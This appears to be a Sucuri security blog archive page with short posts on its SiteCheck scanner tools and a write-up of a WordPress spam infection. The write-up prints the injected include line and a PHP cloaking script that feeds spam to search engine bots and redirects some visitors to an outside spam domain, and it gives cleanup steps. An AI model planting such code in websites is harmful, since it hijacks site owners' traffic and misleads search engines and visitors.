SiteCheck Chrome Extension Now Available

Have you ever wondered if the websites you (or your family) visit contain code that is potentially harmful to you or your computer? If you are a Chrome user, then you’re in luck because we’ve made it much simpler for you to utilize SiteCheck, our website malware scanner. Whether you want to scan your own website or check up on other sites, install our new Chrome extension to make it easier. If you love the extension, let us know in the comments and make sure to tell your friends about this cool new tool.

All right, we’re done selling the benefits of this thing so here are the instructions to install it and try it out for yourself:

First, install the extension from the Google Chrome Web Store.

Next, you’ll be asked to allow access to your webpages. Once you do that, you’ll notice the little Sucuri “S” embedded on the right of your toolbar.

SiteCheck Extension

Finally, to scan any site you’re visiting, just click the Sucuri “S” and our sitecheck will scour the site and return results to you in no time. If you’re visiting a site infected with malware, you will receive a warning like the one below.

SiteCheck Extension - Warn results

Some Technical Details

It’s important to remember that you will need to choose to scan sites when you visit them and that this extension will not automatically scan every site you visit, nor will it prevent you from visiting an infected or blacklisted site (though you could quickly find out if you were on such a site). Our goal is to help consumers of the web as well as webmasters by providing a tool to scan any site on the web without referring back to SiteCheck each time.

Finally, remember that this extension will not automate scans of any website. If you’re in need of consistent monitoring and alerts, just sign up for one of our website protection or prevention plans and let us keep your site malware-free.

WordPress SPAM Causing Headaches

It seems that SPAM is all the rave these days, wonder why, could it be because it’s a multi-million business?

In any event, detecting is always a challenge as is remediating. This is what it might look like if you use our free scanner to scan the website:

Sucuri Spam Detection

Besides some of the obvious things we have started seeing tactics used on Joomla sites on WordPress ones. They are using things like this:


&#64require_once(ABSPATH . '/wp-includes/Text/cache.php');

You’ll find this in your wp-config.php file more often than not. If you follow the cookie trail you’ll find that the cache.php contains code like this:


<?php
$uniq_ua_string=@$_SERVER['HTTP_USER_AGENT'];
$uniq_ref=@$_SERVER["HTTP_REFERER"];
$is_human=1;
if (stristr($uniq_ua_string,"googlebot"))$is_human=0;
if (stristr($uniq_ua_string,"bing"))$is_human=0;
if (stristr($uniq_ua_string,"yahoo"))$is_human=0;
if(@$is_human == 0 && preg_match('/^\/(?:index\.(?:php|html?))?$/', @$_SERVER['REQUEST_URI'])) {
@readfile(dirname(__FILE__)."/css.php");
exit;
}
if(preg_match('/viagra/i', $uniq_ref) > 0) {header("Location: http://vaptk.com/in.php?t=v&s=1");exit;}

?>

If you follow the trail further and go to the css.php file you’ll find all kinds of goodies that will be of particular interest:

Sucuri SPAM Payload

What can I say, sometimes it’s all about following the cookie trail.

When removing be sure to remove the &#64require_once and the payload as well. The good news is if you’re running our plugin you’ll quickly identify an integrity issue in wp-includes and wp-config that will allow you to quickly act to rectify the issue. Because of the time of injection we’d venture to say that the vector is likely compromised credentials to the server, likely via FTP.


Any questions let us know.

Sucuri SiteCheck Malware Scanner Plugin for WordPress

If you’re a WordPress user, love our free SiteCheck scanner, or already use our free SiteCheck Malware Scanner Plugin for WordPress, we have an update for you.

Sucuri Security - SiteCheck Malware Scanner

Read More

Ask Sucuri: How does SiteCheck work?

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?

Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.

Read More

Sucuri SiteCheck – Web Malware Distribution – January 2012

As many know, we have been offering our free website malware scanner – Sucuri SiteCheck, since early in 2011. In our commitment to continue to give back to the community, we want to share some statistics. We’d like to share the distribution of infections based on the number of sites that are being scanned using Sucuri SiteCheck.

In January, we scanned a couple 100 thousand sites. From those we were able to better understand the distribution of malware.

SiteCheck Web Malware Distro


Read More